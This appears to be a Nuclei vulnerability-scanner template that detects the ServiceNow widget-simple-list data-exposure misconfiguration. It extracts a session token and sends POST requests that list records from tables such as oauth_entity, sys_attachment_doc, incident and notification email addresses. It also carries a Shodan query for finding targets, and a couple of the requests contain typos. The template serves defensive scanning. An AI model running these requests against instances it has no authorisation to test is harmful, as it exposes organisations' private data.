id: servicenow-widget-misconfig

info:
  name: ServiceNow Widget-Simple-List - Misconfiguration
  author: DhiyaneshDk
  severity: unknown
  reference:
    - https://github.com/bsysop/servicenow
    - https://twitter.com/ConspiracyProof/status/1713270026046685272
    - https://www.enumerated.ie/servicenow-data-exposure
  metadata:
    max-request: 20
    shodan-query: title:"servicenow"
    verified: true
  tags: servicenow,widget,misconfig

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /login.do HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /api/now/sp/widget/widget-simple-list?t=cmdb_model&f=name HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-UserToken: {{user-token}}
        Content-Type: application/json

        {}

      - |
        POST /api/now/sp/widget/widget-simple-list?t=cmn_department&f=app_name HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-UserToken: {{user-token}}
        Content-Type: application/json

        {}

      - |
        POST /api/now/sp/widget/widget-simple-list?t=kb_knowledge&f=text HTTP/1.
        Host: {{Hostname}}
        Accept: application/json
        X-UserToken: {{user-token}}
        Content-Type: application/json

        {}

      - |
        POST /api/now/sp/widget/widget-simple-list?t=licensable_app&f=app_name HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-UserToken: {{user-token}}
        Content-Type: application/json

        {}

      - |
        POST /api/now/sp/widget/widget-simple-list?t=alm_asset&f=display_name HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-UserToken: {{user-token}}
        Content-Type: application/json

        {}

      - |
        POST /api/now/sp/widget/widget-simple-list?t=sys_attachment&f=file_name HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-UserToken: {{user-token}}
        Content-Type: application/json

        {}

      - |
        POST /api/now/sp/widget/widget-simple-list?t=sys_attachment_doc&f=data HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-UserToken: {{user-token}}
        Content-Type: application/json

        {}

      - |
        POST /api/now/sp/widget/widget-simple-list?t=oauth_entity&f=name HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-UserToken: {{user-token}}
        Content-Type: application/json

        {}

      - |
        POST /api/now/sp/widget/widget-simple-list?t=cmn_cost_center&f=name HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-UserToken: {{user-token}}
        Content-Type: application/json

        {}

      - |
        POST /api/now/sp/widget/widget-simple-list?t=cmdb_model&f=name HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-UserToken: {{user-token}}
        Content-Type: application/json

        {}

      - |
        POST /api/now/sp/widget/widget-simple-list?t=sc_cat_item&f=name HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-UserToken: {{user-token}}
        Content-Type: application/json

        {}

      - |
        POST /api/now/sp/widget/widget-simple-list?t=sn_admin_center_application&f-name HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-UserToken: {{user-token}}
        Content-Type: application/json

        {}

      - |
        POST /api/now/sp/widget/widget-simple-list?t=cmn_company&f=name HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-UserToken: {{user-token}}
        Content-Type: application/json

        {}

      - |
        POST /api/now/sp/widget/widget-simple-list?t=sys_email_attachment&f=email HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-UserToken: {{user-token}}
        Content-Type: application/json

        {}

      - |
        POST /api/now/sp/widget/widget-simple-list?t=sys_email_attachment&f=attachment HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-UserToken: {{user-token}}
        Content-Type: application/json

        {}

      - |
        POST /api/now/sp/widget/widget-simple-list?t=cmn_notif_device&f=email_address HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-UserToken: {{user-token}}
        Content-Type: application/json

        {}

      - |
        POST /api/now/sp/widget/widget-simple-list?t=sys_portal_age&f=display_name HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-UserToken: {{user-token}}
        Content-Type: application/json

        {}

      - |
        POST /api/now/sp/widget/widget-simple-list?t=incident&f=short_description HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-UserToken: {{user-token}}
        Content-Type: application/json

        {}

    cookie-reuse: true
    matchers:
      - type: word
        part: body
        words:
          - '"isValid":true'
          - '"count":'
        condition: and

    extractors:
      - type: regex
        name: user-token
        group: 1
        regex:
          - var g_ck = '([0-9a-z]+)'
        internal: true

      - type: regex
        part: body
        group: 1
        regex:
          - '"count":([0-9]+),'
